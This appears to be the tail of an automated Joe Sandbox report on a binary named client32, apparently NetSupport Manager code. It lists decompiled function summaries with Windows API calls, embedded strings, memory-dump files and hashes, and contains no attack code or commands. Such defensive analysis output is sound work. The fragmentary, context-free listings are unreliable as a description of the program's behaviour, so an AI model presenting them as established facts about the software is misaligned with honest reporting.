                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
                                                                                        • String ID: ConfigList$PCICTL
                                                                                        • API String ID: 4014706405-1939909508
                                                                                        • Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                        • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                        • Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                        • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                        APIs
                                                                                        • IsWindow.USER32(?), ref: 1103B8E8
                                                                                        • _malloc.LIBCMT ref: 1103B97B
                                                                                        • _memmove.LIBCMT ref: 1103B9E0
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001033C,00000007,00000002,00002710,?), ref: 1103BA40
                                                                                        • _free.LIBCMT ref: 1103BA47
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                        • API String ID: 3610575347-2270926670
                                                                                        • Opcode ID: 5afe1aae09a1686d145e014b6988995a74e7e3fdef39e448a5fc1c21bda68c6a
                                                                                        • Instruction ID: cf71befd834ca9d6d619551618e05b544aa7bc38abc68460657087db59e74738
                                                                                        • Opcode Fuzzy Hash: 5afe1aae09a1686d145e014b6988995a74e7e3fdef39e448a5fc1c21bda68c6a
                                                                                        • Instruction Fuzzy Hash: B0514F75E0061E9FDB00CB94CC81EEEF3B9BF98708F104169E526A7280E7316A06CB91
                                                                                        APIs
                                                                                        Strings
                                                                                        • NSLSP, xrefs: 11015708
                                                                                        • %012d, xrefs: 11015674
                                                                                        • PackedCatalogItem, xrefs: 110156E2
                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                        • API String ID: 1333399081-1346142259
                                                                                        • Opcode ID: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                        • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                        • Opcode Fuzzy Hash: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                        • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchSleepTranslate
                                                                                        • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                        • API String ID: 3237117195-3850961587
                                                                                        • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                        • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                                        • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                        • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                          • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                          • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                          • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                          • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                        • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$qu
                                                                                        • API String ID: 3136964118-4145319076
                                                                                        • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                        • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                        • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                        • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                        APIs
                                                                                        • GetWindowPlacement.USER32(00000000,0000002C), ref: 110B9594
                                                                                        • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001), ref: 110B9606
                                                                                        • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                        • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                        • API String ID: 1092798621-1973987134
                                                                                        • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                        • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                                        • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                        • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 2427920155-3145022300
                                                                                        • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                        • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                        • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                        • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000130,000003E8), ref: 1113572F
                                                                                        • GetTickCount.KERNEL32 ref: 1113578C
                                                                                          • Part of subcall function 111449B0: GetTickCount.KERNEL32(B24479DC,00000000,11195AD8,?), ref: 11144A18
                                                                                        • wsprintfA.USER32 ref: 111357BC
                                                                                          • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                        • WaitForSingleObject.KERNEL32(00000130,000003E8), ref: 11135802
                                                                                        Strings
                                                                                        • UI.CPP, xrefs: 111357E9
                                                                                        • ResponseChk, xrefs: 11135717
                                                                                        • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                        • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                        • API String ID: 2020353970-2880927372
                                                                                        • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                        • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                                        • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                        • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeStringUninitializeW@16
                                                                                        • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                        • API String ID: 1826621714-1320232752
                                                                                        • Opcode ID: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                        • Instruction ID: d5a300e082a68ff88eaf99d811029957e717e47c388a0f511f099868f117258d
                                                                                        • Opcode Fuzzy Hash: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                        • Instruction Fuzzy Hash: CE312F75A0061BDBDB24DF54CD84BEAB7B8FF48305F0044E5EA09AB244EB75EA84CB50
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                        • GetShortPathNameA.KERNEL32 ref: 110F166A
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                        • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                        • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                        • API String ID: 1318148156-3179819359
                                                                                        • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                        • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                        • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                        • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 11081859
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                        • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                        • API String ID: 1528188558-3417006389
